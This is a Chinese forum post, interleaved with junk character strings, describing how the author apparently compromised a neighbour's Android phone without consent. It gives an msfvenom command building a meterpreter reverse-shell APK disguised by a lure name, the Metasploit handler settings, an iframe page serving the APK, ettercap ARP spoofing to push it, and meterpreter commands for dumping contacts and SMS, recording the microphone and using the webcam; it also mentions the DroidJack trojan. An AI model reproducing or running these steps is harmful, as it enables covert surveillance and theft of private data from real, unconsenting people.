metasploit+ettercap中间人攻击成功入侵邻居手机

admin · 发表于 2018-10-20 20:30:37

9 `, Z' y; i6 [, s+ D 五、msf+ettercap入侵邻居安卓手机 ) e9 j: m' Y9 z* G

% L1 k& W9 z: j) u) U' f7 [ 首先启动msf ' B8 e- A' z- h1 N0 y

' j) a/ Q: h2 I& s* y8 T/ t 先用kali生成一个安卓木马，如下命令： * s: f" p! S8 G5 J5 L

& ~' z( M2 @, {* W: P/ P5 I( O Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk : V* _5 e& _2 _; t5 G" v' C

5 u. q4 T8 W& P6 o$ X5 m9 a6 L9 z' ? 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”，就不适用替换下载的方法了，据我所知，邻居频繁使用手机浏览器浏览新闻 / W P- r4 m/ ?1 G( p3 y5 z! D5 @

# w& n& I4 p7 O6 k" g; L, k 然后进入msf : @) b7 p& c# i& l

- K# M$ c% P* [ use exploit/multi/handler 1 K: Y/ w% h. q2 X3 U

, S P$ O& [# O! g set payload android/meterpreter/reverse_tcp / n" v( R: R4 F% s9 h" O* ` X1 x( P

/ u7 J8 V0 W4 U2 b' r% j set LHOST 192.168.0.109 //ip为kaili的ip 7 s! q, Y' m8 a' o/ D

+ U7 o1 s7 ~ y/ f& x set LPORT 44444 //端口一定要与前面生成的木马的端口一致 + T; H& i8 l% I6 [9 C+ k( z

; F/ Z: O5 k* G3 j0 t Exploit 1 I5 w$ W: y- y- l2 X

7 }% x' _, B) @" F, m 6 X; H# S9 P" }

: s" h8 }& w' d/ f8 w3 N) i9 g+ B 下面我们开启ettercap -G 1 C# l$ A1 ]6 A8 X+ A

2 I2 P7 C5 Q- J 我物理IP为 / u% C1 p$ z1 o9 p0 F* m2 R9 l* C

2 Z6 n8 C1 a( n* Q- m& d/ F$ h ; P0 a( U4 y0 x% H4 w2 b! N# F

+ v. O+ [# `8 r- O) R 别到时候再把我物理机欺骗了，之前测试物理机只装腾讯管家是可以成功欺骗的， 9 t, v5 t0 K2 S# X0 k2 r

, G" h# ?8 _3 b4 f 下面我们来设置一下 # D: l6 |/ ^, N4 x# P k( p

S7 X5 t( V5 M5 {# M( W & a* w- i8 z1 E& Z6 @: m6 }: M

! S3 C3 n# a [9 ?( j8 | 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下，并创建一个index.htm文件内容为：<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载，用iframe语句就OK了， % y& c, y9 g9 f4 u4 _& E

4 A! ^" I' b4 i / B7 C! E8 ?; i. n# w

! X; D2 G' ~6 D% Z; @ 2 t% T7 y7 l' z

, y0 F. @( c# k) M % H: D" q/ \2 ^- n9 ]

* ]$ B/ a" T5 v ; Z! m# ]3 l6 p B/ O0 j2 l

' T0 Y: ^+ @+ v* w3 T 4 V3 F) P. I4 V4 c

' [8 J U0 X U0 a* r6 v0 ?) ] ; K. K# j S2 Y1 K" Q

& [( L% B Y0 `* y& G' t 6 t% D; i1 z: C. V

+ W/ l8 p M1 l0 x- B& K( T6 K # E! g- E: t5 ~# V% ]$ w

5 U* o5 r( N8 {# y: d ; M/ H% t9 O- F+ I

: H/ Q: w3 _( y1 q) H$ b + |8 F' v. A# `

+ l; L+ U$ f2 p Q & Y. ]9 V. m4 l. I i, K8 c& q

: P8 |! a$ e- l, R & Y; I4 \- P$ p8 C0 R) g* S

% U7 x8 R2 @0 e, I* q) V% J 0 G' d) w8 H1 ]0 y" I

3 d, o o [5 b T9 |8 b' V 下面我们开始攻击 + h. L& u) v& N* g

8 Z' u3 r$ S" [ . j3 W) h# [" L0 y' {

/ h% C5 s! C. O3 b" c: l% g8 f 2 I) B, {( M# X/ k: S& V$ H7 K

# z* `5 c3 v I; \' y * t8 v# u. K! w) k2 x1 L! C# R

6 |* Q1 g7 C: y7 D2 H % b. C8 O7 w; L" R

" c2 T4 y9 ^: L# K1 [( p& o ) r/ B6 z+ a; e4 p3 L( n; H

. E+ Z4 h! {. }. U# | 大概过了5分钟多，发现反弹成功了 6 d. Y1 k* g0 N5 b+ c* E$ B

6 B! x9 }$ K1 W' ~" S6 p

* w C( T# m! @- P6 n! x2 o5 ^ 4 ?, h5 b4 h7 q. a

6 x! }* a$ o) n; t: w( y 0 `6 `/ @ l/ C/ E, G. x; ^; E

L$ l: |3 ~* h' u( d3 C 2 O K* `5 P# w& o$ ?9 A

5 K) c0 H6 \. E0 S& ` , m+ q1 q; R& `- c. f

. i3 A: k1 \9 E* O. V& V/ z ` ! S. k) e7 Q, q) s0 X# y/ O, T$ }8 _

) I0 K8 P* E9 u2 F- x: B9 W ( z0 O7 r s5 d+ O

$ {1 E W5 F! ^, t 执行命令 ( t% I* I% P2 G; L2 Q. [

! i0 v; @( Q, c1 n* J3 a8 A B6 w* T( f4 O8 B8 w o8 f

$ k8 W2 }5 v9 y! d: o4 ?: s dump_contacts --》这个是导出电话 3 w/ X" y( [1 b1 Z* O4 L4 S

, o- j' r" b9 K9 i& ? dump_sms --》这个是导出信息 4 n, \* ]' i. C2 J+ `. ]: w# Y& {

3 c6 P. y# W* r/ B( r record_mic Record audio from the default microphone for X seconds / o( p. P# j7 w) A) G

2 ]1 G1 R3 t& y2 e& a+ L: A7 b. M webcam_chat Start a video chat 9 Q8 y0 q7 d4 _! K/ b% t: V( b

6 ?' r( s" l6 e webcam_list List webcams 1 p( l. I3 q* Y2 e! \/ S

8 G2 c, K0 w0 X: R, W webcam_snap Take a snapshot from the specified webcam 8 e$ ]8 F/ c( h- y. E) \. L

5 G; b, {" r2 n A! _8 V webcam_stream lay a video stream from the specified webcam - a! F, X# C, O ^' g, z1 b3 [

2 |" e: ^& q5 Y# L( p3 u0 L$ x + \, W- X, t D* a2 f

6 U5 P5 N" F) ?2 \% a/ G 4 i1 j! }+ L: \* k# O9 U; C$ Q& R

0 R$ X, p1 G9 F 我们打开看一下电话薄， 0 L, U' x e0 `9 s$ G5 C' F# J

" \9 ~" ] m! { & c# E+ c1 K. U A) z; l

; _2 e [: ?6 g5 B/ w* |' \1 Q4 C% x ; y+ a0 l5 _! }- S3 M( o f

' ?( t2 N2 ~& J 8 z( ]: i! S: h: b

2 B& B' i1 K& o3 D% h* C: a 1 R6 `- |$ R/ S; e2 o& X) h

/ I. ?, [0 d/ T$ K+ J / P( s1 b" Q1 @; d( a9 o

- o7 i" u2 K: i. T u7 {6 f9 H & G8 `( S# K3 o0 G' B! y; R* b

# v+ I1 a2 \- d 我们同时欺骗成DroidJack木马，使用方法如图： ; O6 e$ E0 U' \

) U, ~1 ^3 }" ~# K . R( l, M7 I3 B! ?5 e0 ^1 b

. M# w% }6 p8 u9 J1 M - y1 g5 ^9 N5 y2 E

) M9 {& c; j0 n5 W! V * Z$ W* b7 V1 t8 s% x2 h s$ y1 Z

* j3 \" M+ U, W# Y 切记在前面生成完马以后记得在这里选择开关为on，并且对应前面生成马的时候的端口 : n& E0 h7 u7 |5 Y9 K

L4 Z# ^9 ?- P : W, }' g; i9 ?8 _* Z/ Z& S4 S+ F

( W- n% S6 ^8 e6 G8 m, ^ J4 i ( s2 U* R C# J' u! C

- u4 B9 y: |, S+ U; _ % Z. e- J0 c# {3 [6 t

8 [- a9 [) _+ K) }8 J% |0 G! ~+ m + C2 d( I' X3 A% X9 t* j

0 f+ U4 A9 o$ i. l2 I
6 T6 K* i4 t' b

		自动登录	找回密码
密码			立即注册

metasploit+ettercap中间人攻击成功入侵邻居手机

浏览过的版块